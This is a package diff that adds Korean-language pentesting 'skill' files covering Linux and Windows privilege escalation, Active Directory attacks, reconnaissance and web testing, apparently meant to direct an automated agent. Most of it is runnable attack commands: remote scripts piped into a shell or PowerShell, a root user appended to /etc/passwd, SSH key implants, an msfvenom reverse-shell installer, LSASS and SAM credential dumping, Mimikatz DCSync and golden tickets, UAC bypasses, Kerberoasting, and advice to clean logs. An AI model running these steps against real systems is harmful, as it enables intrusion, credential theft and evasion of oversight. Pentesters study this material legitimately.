pentesting 0.1.0

package/skills/privilege-escalation-linux.md

@@ -0,0 +1,228 @@
+---
+name: privilege-escalation-linux
+description: 리눅스 권한 상승 기법 및 루팅 스킬
+---
+
+# Linux Privilege Escalation Skill
+
+초기 쉘 획득 후 루트 권한 획득을 위한 체계적 접근법입니다.
+
+## 🎯 목표
+저권한 사용자에서 root 권한 획득
+
+## 📋 열거 (Enumeration)
+
+### 1. 기본 시스템 정보
+```bash
+# 커널/OS 정보
+uname -a
+cat /etc/os-release
+cat /proc/version
+
+# 호스트명 및 네트워크
+hostname
+ip a
+cat /etc/hosts
+
+# 현재 사용자
+id
+whoami
+```
+
+### 2. LinPEAS 실행 (권장)
+```bash
+# 다운로드 및 실행
+curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
+
+# 또는 파일로 저장 후 실행
+wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
+chmod +x linpeas.sh
+./linpeas.sh -a 2>&1 | tee linpeas_output.txt
+```
+
+## 🔍 권한 상승 벡터
+
+### 1. 커널 익스플로잇
+```bash
+# 커널 버전 확인
+uname -r
+
+# 취약점 확인
+./linux-exploit-suggester.sh
+
+# 주요 커널 익스플로잇:
+# - Dirty COW (CVE-2016-5195) - Linux < 4.8.3
+# - Dirty Pipe (CVE-2022-0847) - Linux 5.8 - 5.16.11
+# - PwnKit (CVE-2021-4034) - Polkit pkexec
+# - Baron Samedit (CVE-2021-3156) - sudo < 1.9.5p2
+```
+
+### 2. SUID/SGID 바이너리
+```bash
+# SUID 파일 찾기
+find / -perm -4000 -type f 2>/dev/null
+
+# SGID 파일 찾기
+find / -perm -2000 -type f 2>/dev/null
+
+# GTFOBins에서 익스플로잇 확인
+# https://gtfobins.github.io/
+
+# 일반적인 SUID 익스플로잇
+# nmap (interactive mode)
+nmap --interactive
+!sh
+
+# find
+find . -exec /bin/sh \; -quit
+
+# vim
+vim -c ':!/bin/sh'
+
+# python
+python -c 'import os; os.setuid(0); os.system("/bin/sh")'
+```
+
+### 3. Sudo 설정
+```bash
+# sudo 권한 확인
+sudo -l
+
+# NOPASSWD 엔트리 확인
+# (ALL : ALL) NOPASSWD: /usr/bin/vim
+
+# sudo 버전 확인 (Baron Samedit)
+sudo --version
+```
+
+### 4. Cron Jobs
+```bash
+# 크론 작업 확인
+cat /etc/crontab
+ls -la /etc/cron.*
+crontab -l
+
+# 다른 사용자 크론탭
+ls -la /var/spool/cron/crontabs/
+
+# PATH 하이재킹
+# 크론이 상대경로로 스크립트 실행 시 악성 스크립트 삽입
+
+# pspy로 프로세스 모니터링
+./pspy64
+```
+
+### 5. 쓰기 가능한 파일
+```bash
+# /etc/passwd 쓰기 가능
+ls -la /etc/passwd
+# 가능하면 루트 사용자 추가:
+echo 'hacker:$(openssl passwd -1 password):0:0::/root:/bin/bash' >> /etc/passwd
+
+# SSH 키 삽입
+mkdir -p /root/.ssh
+echo "ssh-rsa YOUR_PUBLIC_KEY" >> /root/.ssh/authorized_keys
+```
+
+### 6. Capabilities
+```bash
+# 캐퍼빌리티 열거
+getcap -r / 2>/dev/null
+
+# cap_setuid 익스플로잇 (예: python)
+# /usr/bin/python3 = cap_setuid+ep
+python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
+```
+
+### 7. NFS 설정
+```bash
+# NFS 공유 확인
+cat /etc/exports
+showmount -e {{target_ip}}
+
+# no_root_squash 익스플로잇
+# 공격자 머신에서:
+mkdir /tmp/nfs
+mount -t nfs {{target_ip}}:/share /tmp/nfs
+cp /bin/bash /tmp/nfs/rootbash
+chmod +s /tmp/nfs/rootbash
+# 타겟에서:
+/share/rootbash -p
+```
+
+### 8. Docker 그룹
+```bash
+# docker 그룹 멤버십 확인
+id
+
+# docker로 루트 획득
+docker run -v /:/mnt --rm -it alpine chroot /mnt sh
+```
+
+### 9. LXD/LXC 그룹
+```bash
+# lxd 그룹 확인
+id
+
+# 이미지 빌드 및 권한 상승
+git clone https://github.com/saghul/lxd-alpine-builder.git
+cd lxd-alpine-builder
+./build-alpine
+lxc image import ./alpine-v*.tar.gz --alias myimage
+lxc init myimage mycontainer -c security.privileged=true
+lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
+lxc start mycontainer
+lxc exec mycontainer /bin/sh
+```
+
+## 🛠️ 자동화 스크립트
+
+### 전체 열거
+```bash
+#!/bin/bash
+echo "=== Linux Privilege Escalation Enumeration ==="
+
+echo -e "\n[*] System Info"
+uname -a
+cat /etc/os-release 2>/dev/null
+
+echo -e "\n[*] Current User"
+id
+
+echo -e "\n[*] Sudo Permissions"
+sudo -l 2>/dev/null
+
+echo -e "\n[*] SUID Binaries"
+find / -perm -4000 -type f 2>/dev/null
+
+echo -e "\n[*] Capabilities"
+getcap -r / 2>/dev/null
+
+echo -e "\n[*] Writable /etc/passwd"
+ls -la /etc/passwd
+
+echo -e "\n[*] Cron Jobs"
+cat /etc/crontab 2>/dev/null
+ls -la /etc/cron.d/ 2>/dev/null
+
+echo -e "\n[*] Docker/LXD Group"
+groups
+
+echo -e "\n=== Enumeration Complete ==="
+```
+
+## 📊 우선순위
+
+1. **sudo -l** 확인 (가장 빠름)
+2. **SUID 바이너리** 확인
+3. **커널 버전** → 익스플로잇 검색
+4. **크론 작업** 분석
+5. **Docker/LXD 그룹** 확인
+6. **쓰기 가능 파일** 검색
+
+## ⚠️ 주의사항
+
+- 항상 백업 사용자 생성
+- 익스플로잇 실행 전 환경 확인
+- 시스템 크래시 가능성 인지
+- 로그 정리 고려

package/skills/privilege-escalation-windows.md

@@ -0,0 +1,252 @@
+---
+name: privilege-escalation-windows
+description: 윈도우 권한 상승 기법 및 도메인 장악 스킬
+---
+
+# Windows Privilege Escalation Skill
+
+초기 쉘 획득 후 시스템/도메인 관리자 권한 획득을 위한 체계적 접근법입니다.
+
+## 🎯 목표
+일반 사용자에서 SYSTEM/Administrator 권한 획득, Active Directory 도메인 장악
+
+## 📋 열거 (Enumeration)
+
+### 1. 기본 시스템 정보
+```powershell
+# 시스템 정보
+systeminfo
+hostname
+
+# 현재 사용자
+whoami
+whoami /priv
+whoami /groups
+
+# 네트워크
+ipconfig /all
+route print
+netstat -ano
+```
+
+### 2. WinPEAS 실행 (권장)
+```powershell
+# 다운로드 및 실행
+certutil -urlcache -f https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany.exe winpeas.exe
+.\winpeas.exe
+
+# 또는 PowerShell로
+IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')
+```
+
+## 🔍 권한 상승 벡터
+
+### 1. 토큰 조작 (SeImpersonate/SeAssignPrimaryToken)
+```powershell
+# 권한 확인
+whoami /priv
+
+# SeImpersonatePrivilege 또는 SeAssignPrimaryTokenPrivilege 있으면:
+# JuicyPotato (Windows 10 1809 이전, Server 2019 이전)
+.\JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID}
+
+# PrintSpoofer (Windows 10, Server 2016/2019)
+.\PrintSpoofer.exe -i -c cmd
+
+# GodPotato (모든 Windows 버전)
+.\GodPotato.exe -cmd "cmd /c whoami"
+
+# RoguePotato
+.\RoguePotato.exe -r {{attacker_ip}} -e "cmd.exe /c whoami"
+```
+
+### 2. 서비스 익스플로잇
+```powershell
+# 서비스 목록 확인
+sc query state= all
+wmic service list brief
+
+# 서비스 권한 확인
+accesschk.exe /accepteula -uwcqv "Everyone" *
+accesschk.exe /accepteula -uwcqv "Users" *
+
+# Unquoted Service Paths
+wmic service get name,pathname,displayname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
+
+# 서비스 바이너리 교체
+# 1. 취약 서비스 중지
+sc stop VulnService
+# 2. 악성 바이너리로 교체
+copy evil.exe "C:\Program Files\Vuln Service\service.exe"
+# 3. 서비스 시작
+sc start VulnService
+```
+
+### 3. 레지스트리 익스플로잇
+```powershell
+# AlwaysInstallElevated
+reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
+
+# 둘 다 1이면:
+msfvenom -p windows/x64/shell_reverse_tcp LHOST={{ip}} LPORT=4444 -f msi -o evil.msi
+msiexec /quiet /qn /i evil.msi
+
+# AutoRuns
+reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
+
+# 저장된 자격증명
+reg query HKLM /f password /t REG_SZ /s
+reg query HKCU /f password /t REG_SZ /s
+```
+
+### 4. 스케줄 작업
+```powershell
+# 스케줄 작업 확인
+schtasks /query /fo LIST /v
+Get-ScheduledTask | where {$_.Principal.UserId -ne ""}
+
+# 쓰기 가능한 스크립트 확인
+icacls "C:\Path\To\Script.ps1"
+```
+
+### 5. 자격증명 수집
+```powershell
+# 캐시된 자격증명
+cmdkey /list
+
+# runas로 저장된 자격증명 사용
+runas /savecred /user:Administrator cmd.exe
+
+# SAM 파일 덤프
+reg save hklm\sam sam
+reg save hklm\system system
+# Impacket으로 추출
+secretsdump.py -sam sam -system system LOCAL
+
+# LSASS 덤프 (관리자)
+procdump.exe -ma lsass.exe lsass.dmp
+# Mimikatz로 분석
+sekurlsa::minidump lsass.dmp
+sekurlsa::logonPasswords
+```
+
+### 6. Mimikatz (관리자 필요)
+```powershell
+# 권한 확보
+privilege::debug
+
+# 메모리에서 암호 추출
+sekurlsa::logonpasswords
+
+# SAM 덤프
+lsadump::sam
+
+# 도메인 컨트롤러에서 DCSync
+lsadump::dcsync /domain:corp.local /user:Administrator
+
+# Golden Ticket 생성
+kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:xxx /ptt
+```
+
+### 7. UAC 바이패스
+```powershell
+# UAC 수준 확인
+reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
+
+# fodhelper 바이패스
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f
+reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
+fodhelper.exe
+
+# eventvwr 바이패스
+reg add HKCU\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f
+eventvwr.exe
+```
+
+## 🏰 Active Directory 공격
+
+### 1. 도메인 정보 수집
+```powershell
+# 도메인 정보
+nltest /dclist:domain.local
+net group "Domain Admins" /domain
+net group "Domain Controllers" /domain
+
+# BloodHound 수집
+.\SharpHound.exe -c All
+# 또는 Python 버전
+bloodhound-python -u user -p 'password' -d domain.local -c all
+```
+
+### 2. Kerberoasting
+```powershell
+# SPN 열거
+setspn -T domain.local -Q */*
+
+# 티켓 요청 및 추출
+.\Rubeus.exe kerberoast /outfile:hashes.txt
+
+# Impacket으로
+GetUserSPNs.py domain.local/user:password -request -outputfile hashes.txt
+
+# Hashcat으로 크래킹
+hashcat -m 13100 hashes.txt wordlist.txt
+```
+
+### 3. AS-REP Roasting
+```powershell
+# Kerberos Pre-Auth 비활성화된 사용자 찾기
+.\Rubeus.exe asreproast /outfile:asrep_hashes.txt
+
+# Impacket으로
+GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile asrep.txt
+
+# Hashcat으로 크래킹
+hashcat -m 18200 asrep.txt wordlist.txt
+```
+
+### 4. Pass-the-Hash / Pass-the-Ticket
+```powershell
+# Pass-the-Hash
+sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:{{ntlm_hash}} /run:cmd
+
+# Impacket으로
+psexec.py -hashes :{{ntlm_hash}} domain.local/Administrator@{{target}}
+
+# Pass-the-Ticket
+.\Rubeus.exe ptt /ticket:{{base64_ticket}}
+```
+
+### 5. DCSync (도메인 관리자 필요)
+```powershell
+# Mimikatz
+lsadump::dcsync /domain:domain.local /user:krbtgt
+
+# Impacket
+secretsdump.py domain.local/Administrator@{{dc_ip}} -just-dc-ntlm
+```
+
+## 🛠️ 자동화 열거
+
+```powershell
+# PowerUp
+IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
+Invoke-AllChecks
+
+# Seatbelt
+.\Seatbelt.exe -group=all
+
+# SharpUp
+.\SharpUp.exe
+```
+
+## 📊 우선순위
+
+1. **whoami /priv** - 토큰 권한 확인
+2. **서비스 권한** - Unquoted paths, 약한 권한
+3. **자격증명** - 캐시/저장된 자격증명
+4. **레지스트리** - AlwaysInstallElevated
+5. **AD 공격** - Kerberoasting, AS-REP
+6. **커널 익스플로잇** - 마지막 수단

package/skills/reconnaissance.md

@@ -0,0 +1,52 @@
+---
+name: reconnaissance
+description: 정찰 및 OSINT 정보 수집 스킬
+---
+
+# Reconnaissance Skill
+
+이 스킬은 타겟에 대한 초기 정보 수집을 수행합니다.
+
+## 사용 도구
+- whois
+- dig
+- nslookup
+- theHarvester
+- amass
+
+## 절차
+
+### 1. 도메인 정보 수집
+```bash
+whois {{target}}
+```
+
+### 2. DNS 레코드 조회
+```bash
+dig {{target}} ANY +noall +answer
+dig {{target}} MX +short
+dig {{target}} NS +short
+dig {{target}} TXT +short
+```
+
+### 3. 서브도메인 열거
+```bash
+# Passive enumeration
+amass enum -passive -d {{target}}
+```
+
+### 4. 이메일 수집
+```bash
+theHarvester -d {{target}} -b all
+```
+
+## 수집할 정보
+- 도메인 등록 정보
+- DNS 서버
+- 메일 서버
+- 서브도메인
+- 이메일 주소
+- 관련 IP 주소
+
+## 출력
+모든 수집된 정보를 정리하여 다음 단계(Scanning)에 활용합니다.

package/skills/web-application-testing.md

@@ -0,0 +1,75 @@
+---
+name: web-application-testing
+description: 웹 애플리케이션 취약점 진단 스킬
+---
+
+# Web Application Testing Skill
+
+웹 애플리케이션에 대한 종합적인 보안 평가를 수행합니다.
+
+## OWASP Top 10 점검
+
+### 1. Injection (A01)
+```bash
+# SQL Injection 테스트
+sqlmap -u "{{url}}?id=1" --batch --level=3 --risk=2
+
+# OS Command Injection
+commix --url="{{url}}" --batch
+```
+
+### 2. Broken Authentication (A02)
+- 기본/약한 자격 증명 테스트
+- 세션 관리 분석
+- 브루트포스 공격
+
+### 3. Sensitive Data Exposure (A03)
+```bash
+# SSL/TLS 설정 확인
+testssl {{target}}
+
+# 민감정보 노출 검색
+grep -r "password\|secret\|key\|api" ./
+```
+
+### 4. XML External Entities (A04)
+- XXE 페이로드 테스트
+- DTD 처리 확인
+
+### 5. Broken Access Control (A05)
+- IDOR 테스트
+- 권한 상승 시도
+
+## 도구 체인
+
+### 정보 수집
+```bash
+whatweb {{url}}
+wafw00f {{url}}
+```
+
+### 디렉토리 열거
+```bash
+gobuster dir -u {{url}} -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
+ffuf -u {{url}}/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt
+```
+
+### 취약점 스캔
+```bash
+nikto -h {{url}}
+nuclei -u {{url}} -t cves/
+```
+
+### 퍼징
+```bash
+wfuzz -c -z file,/usr/share/wordlists/wfuzz/general/common.txt --hc 404 {{url}}/FUZZ
+```
+
+## 보고 형식
+
+각 발견 사항에 대해:
+1. 취약점 유형
+2. 영향받는 URL/파라미터
+3. 재현 단계
+4. 영향도 (CVSS)
+5. 권장 조치